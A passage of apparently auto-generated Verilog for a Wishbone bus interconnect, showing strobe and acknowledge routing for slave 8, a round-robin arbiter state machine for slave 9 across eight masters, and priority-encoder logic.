    always @ (  ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd8 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd8 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd8 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd8 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd8 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd8 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd8 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd8 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s8_wb_stb_o = ( ( ( m0_slv_sel == 4'd8 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s8_wb_stb_o = ( ( ( m1_slv_sel == 4'd8 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s8_wb_stb_o = ( ( ( m2_slv_sel == 4'd8 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s8_wb_stb_o = ( ( ( m3_slv_sel == 4'd8 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s8_wb_stb_o = ( ( ( m4_slv_sel == 4'd8 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s8_wb_stb_o = ( ( ( m5_slv_sel == 4'd8 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s8_wb_stb_o = ( ( ( m6_slv_sel == 4'd8 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s8_wb_stb_o = ( ( ( m7_slv_sel == 4'd8 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s8_m0_ack_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s8_ack_i );
    assign s8_m1_ack_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s8_ack_i );
    assign s8_m2_ack_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s8_ack_i );
    assign s8_m3_ack_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s8_ack_i );
    assign s8_m4_ack_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s8_ack_i );
    assign s8_m5_ack_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s8_ack_i );
    assign s8_m6_ack_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s8_ack_i );
    assign s8_m7_ack_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s8_ack_i );
    assign s8_m0_err_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s8_err_i );
    assign s8_m1_err_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s8_err_i );
    assign s8_m2_err_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s8_err_i );
    assign s8_m3_err_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s8_err_i );
    assign s8_m4_err_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s8_err_i );
    assign s8_m5_err_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s8_err_i );
    assign s8_m6_err_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s8_err_i );
    assign s8_m7_err_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s8_err_i );
    assign s8_m0_rty_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s8_rty_i );
    assign s8_m1_rty_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s8_rty_i );
    assign s8_m2_rty_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s8_rty_i );
    assign s8_m3_rty_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s8_rty_i );
    assign s8_m4_rty_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s8_rty_i );
    assign s8_m5_rty_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s8_rty_i );
    assign s8_m6_rty_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s8_rty_i );
    assign s8_m7_rty_o = ( ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s8_rty_i );
    assign s9_wb_data_i = s9_data_i;
    assign s9_data_o = s9_wb_data_o;
    assign s9_addr_o = s9_wb_addr_o;
    assign s9_sel_o = s9_wb_sel_o;
    assign s9_we_o = s9_wb_we_o;
    assign s9_cyc_o = s9_wb_cyc_o;
    assign s9_stb_o = s9_wb_stb_o;
    assign s9_wb_ack_i = s9_ack_i;
    assign s9_wb_err_i = s9_err_i;
    assign s9_wb_rty_i = s9_rty_i;
    always @ (  posedge clk_i)
    begin
        s9_next <=  ~( s9_wb_cyc_o);
    end
    assign s9_arb_req = { m7_s9_cyc_o, m6_s9_cyc_o, m5_s9_cyc_o, m4_s9_cyc_o, m3_s9_cyc_o, m2_s9_cyc_o, m1_s9_cyc_o, m0_s9_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s9_arb_state <= s9_arb_grant0;
        end
        else
        begin 
            s9_arb_state <= s9_arb_next_state;
        end
    end
    always @ (  s9_arb_state or  { m7_s9_cyc_o, m6_s9_cyc_o, m5_s9_cyc_o, m4_s9_cyc_o, m3_s9_cyc_o, m2_s9_cyc_o, m1_s9_cyc_o, m0_s9_cyc_o } or  1'b0)
    begin
        s9_arb_next_state = s9_arb_state;
        case ( s9_arb_state ) 
        s9_arb_grant0:
        begin
            if (  !( s9_arb_req[0]) | 1'b0 ) 
            begin
                if ( s9_arb_req[1] ) 
                begin
                    s9_arb_next_state = s9_arb_grant1;
                end
                else
                begin 
                    if ( s9_arb_req[2] ) 
                    begin
                        s9_arb_next_state = s9_arb_grant2;
                    end
                    else
                    begin 
                        if ( s9_arb_req[3] ) 
                        begin
                            s9_arb_next_state = s9_arb_grant3;
                        end
                        else
                        begin 
                            if ( s9_arb_req[4] ) 
                            begin
                                s9_arb_next_state = s9_arb_grant4;
                            end
                            else
                            begin 
                                if ( s9_arb_req[5] ) 
                                begin
                                    s9_arb_next_state = s9_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s9_arb_req[6] ) 
                                    begin
                                        s9_arb_next_state = s9_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s9_arb_req[7] ) 
                                        begin
                                            s9_arb_next_state = s9_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_arb_grant1:
        begin
            if (  !( s9_arb_req[1]) | 1'b0 ) 
            begin
                if ( s9_arb_req[2] ) 
                begin
                    s9_arb_next_state = s9_arb_grant2;
                end
                else
                begin 
                    if ( s9_arb_req[3] ) 
                    begin
                        s9_arb_next_state = s9_arb_grant3;
                    end
                    else
                    begin 
                        if ( s9_arb_req[4] ) 
                        begin
                            s9_arb_next_state = s9_arb_grant4;
                        end
                        else
                        begin 
                            if ( s9_arb_req[5] ) 
                            begin
                                s9_arb_next_state = s9_arb_grant5;
                            end
                            else
                            begin 
                                if ( s9_arb_req[6] ) 
                                begin
                                    s9_arb_next_state = s9_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s9_arb_req[7] ) 
                                    begin
                                        s9_arb_next_state = s9_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s9_arb_req[0] ) 
                                        begin
                                            s9_arb_next_state = s9_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_arb_grant2:
        begin
            if (  !( s9_arb_req[2]) | 1'b0 ) 
            begin
                if ( s9_arb_req[3] ) 
                begin
                    s9_arb_next_state = s9_arb_grant3;
                end
                else
                begin 
                    if ( s9_arb_req[4] ) 
                    begin
                        s9_arb_next_state = s9_arb_grant4;
                    end
                    else
                    begin 
                        if ( s9_arb_req[5] ) 
                        begin
                            s9_arb_next_state = s9_arb_grant5;
                        end
                        else
                        begin 
                            if ( s9_arb_req[6] ) 
                            begin
                                s9_arb_next_state = s9_arb_grant6;
                            end
                            else
                            begin 
                                if ( s9_arb_req[7] ) 
                                begin
                                    s9_arb_next_state = s9_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s9_arb_req[0] ) 
                                    begin
                                        s9_arb_next_state = s9_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s9_arb_req[1] ) 
                                        begin
                                            s9_arb_next_state = s9_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_arb_grant3:
        begin
            if (  !( s9_arb_req[3]) | 1'b0 ) 
            begin
                if ( s9_arb_req[4] ) 
                begin
                    s9_arb_next_state = s9_arb_grant4;
                end
                else
                begin 
                    if ( s9_arb_req[5] ) 
                    begin
                        s9_arb_next_state = s9_arb_grant5;
                    end
                    else
                    begin 
                        if ( s9_arb_req[6] ) 
                        begin
                            s9_arb_next_state = s9_arb_grant6;
                        end
                        else
                        begin 
                            if ( s9_arb_req[7] ) 
                            begin
                                s9_arb_next_state = s9_arb_grant7;
                            end
                            else
                            begin 
                                if ( s9_arb_req[0] ) 
                                begin
                                    s9_arb_next_state = s9_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s9_arb_req[1] ) 
                                    begin
                                        s9_arb_next_state = s9_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s9_arb_req[2] ) 
                                        begin
                                            s9_arb_next_state = s9_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_arb_grant4:
        begin
            if (  !( s9_arb_req[4]) | 1'b0 ) 
            begin
                if ( s9_arb_req[5] ) 
                begin
                    s9_arb_next_state = s9_arb_grant5;
                end
                else
                begin 
                    if ( s9_arb_req[6] ) 
                    begin
                        s9_arb_next_state = s9_arb_grant6;
                    end
                    else
                    begin 
                        if ( s9_arb_req[7] ) 
                        begin
                            s9_arb_next_state = s9_arb_grant7;
                        end
                        else
                        begin 
                            if ( s9_arb_req[0] ) 
                            begin
                                s9_arb_next_state = s9_arb_grant0;
                            end
                            else
                            begin 
                                if ( s9_arb_req[1] ) 
                                begin
                                    s9_arb_next_state = s9_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s9_arb_req[2] ) 
                                    begin
                                        s9_arb_next_state = s9_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s9_arb_req[3] ) 
                                        begin
                                            s9_arb_next_state = s9_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_arb_grant5:
        begin
            if (  !( s9_arb_req[5]) | 1'b0 ) 
            begin
                if ( s9_arb_req[6] ) 
                begin
                    s9_arb_next_state = s9_arb_grant6;
                end
                else
                begin 
                    if ( s9_arb_req[7] ) 
                    begin
                        s9_arb_next_state = s9_arb_grant7;
                    end
                    else
                    begin 
                        if ( s9_arb_req[0] ) 
                        begin
                            s9_arb_next_state = s9_arb_grant0;
                        end
                        else
                        begin 
                            if ( s9_arb_req[1] ) 
                            begin
                                s9_arb_next_state = s9_arb_grant1;
                            end
                            else
                            begin 
                                if ( s9_arb_req[2] ) 
                                begin
                                    s9_arb_next_state = s9_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s9_arb_req[3] ) 
                                    begin
                                        s9_arb_next_state = s9_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s9_arb_req[4] ) 
                                        begin
                                            s9_arb_next_state = s9_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_arb_grant6:
        begin
            if (  !( s9_arb_req[6]) | 1'b0 ) 
            begin
                if ( s9_arb_req[7] ) 
                begin
                    s9_arb_next_state = s9_arb_grant7;
                end
                else
                begin 
                    if ( s9_arb_req[0] ) 
                    begin
                        s9_arb_next_state = s9_arb_grant0;
                    end
                    else
                    begin 
                        if ( s9_arb_req[1] ) 
                        begin
                            s9_arb_next_state = s9_arb_grant1;
                        end
                        else
                        begin 
                            if ( s9_arb_req[2] ) 
                            begin
                                s9_arb_next_state = s9_arb_grant2;
                            end
                            else
                            begin 
                                if ( s9_arb_req[3] ) 
                                begin
                                    s9_arb_next_state = s9_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s9_arb_req[4] ) 
                                    begin
                                        s9_arb_next_state = s9_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s9_arb_req[5] ) 
                                        begin
                                            s9_arb_next_state = s9_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_arb_grant7:
        begin
            if (  !( s9_arb_req[7]) | 1'b0 ) 
            begin
                if ( s9_arb_req[0] ) 
                begin
                    s9_arb_next_state = s9_arb_grant0;
                end
                else
                begin 
                    if ( s9_arb_req[1] ) 
                    begin
                        s9_arb_next_state = s9_arb_grant1;
                    end
                    else
                    begin 
                        if ( s9_arb_req[2] ) 
                        begin
                            s9_arb_next_state = s9_arb_grant2;
                        end
                        else
                        begin 
                            if ( s9_arb_req[3] ) 
                            begin
                                s9_arb_next_state = s9_arb_grant3;
                            end
                            else
                            begin 
                                if ( s9_arb_req[4] ) 
                                begin
                                    s9_arb_next_state = s9_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s9_arb_req[5] ) 
                                    begin
                                        s9_arb_next_state = s9_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s9_arb_req[6] ) 
                                        begin
                                            s9_arb_next_state = s9_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s9_msel_req = { m7_s9_cyc_o, m6_s9_cyc_o, m5_s9_cyc_o, m4_s9_cyc_o, m3_s9_cyc_o, m2_s9_cyc_o, m1_s9_cyc_o, m0_s9_cyc_o };
    assign s9_msel_pri_enc_valid = { m7_s9_cyc_o, m6_s9_cyc_o, m5_s9_cyc_o, m4_s9_cyc_o, m3_s9_cyc_o, m2_s9_cyc_o, m1_s9_cyc_o, m0_s9_cyc_o };
    always @ (  s9_msel_pri_enc_valid[0] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[0]) ) 
        begin
            s9_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'h1 ) 
                begin
                    s9_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'h2 ) 
                    begin
                        s9_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s9_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[0] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[0]) ) 
        begin
            s9_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s9_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[1] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[1]) ) 
        begin
            s9_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'h1 ) 
                begin
                    s9_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'h2 ) 
                    begin
                        s9_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s9_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[1] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[1]) ) 
        begin
            s9_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s9_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[2] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[2]) ) 
        begin
            s9_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'h1 ) 
                begin
                    s9_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'h2 ) 
                    begin
                        s9_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s9_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[2] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[2]) ) 
        begin
            s9_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s9_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[3] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[3]) ) 
        begin
            s9_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
